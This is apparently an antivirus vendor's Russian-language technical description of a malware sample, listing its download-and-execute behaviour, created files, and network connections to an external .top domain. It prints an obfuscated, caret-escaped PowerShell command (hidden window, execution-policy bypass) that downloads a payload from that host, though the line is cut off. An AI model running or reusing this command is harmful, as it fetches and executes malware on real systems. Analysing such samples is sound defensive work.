Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "p^o^W^ER^Sh^el^L^.Ex^E ^-E^X^e^cU^TIoNpoLI^cy Byp^AsS -nOP^RoF^I^LE -^wi^Nd^oWStYLE ^H^IDdEn (NEw-^o^B^JeCt ^sy^SteM.nE^t^.^we^b^cl^IENT^).d^o^w^N^Lo^AdF^ilE^('http://aloep...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "p^o^W^ER^Sh^el^L^.Ex^E ^-E^X^e^cU^TIoNpoLI^cy Byp^AsS -nOP^RoF^I^LE -^wi^Nd^oWStYLE ^H^IDdEn (NEw-^o^B^JeCt ^sy^SteM.nE^t^.^we^b^cl^IENT^).d^o^w^N^Lo^AdF^ilE^('http://aloep...' (со скрытым окном)
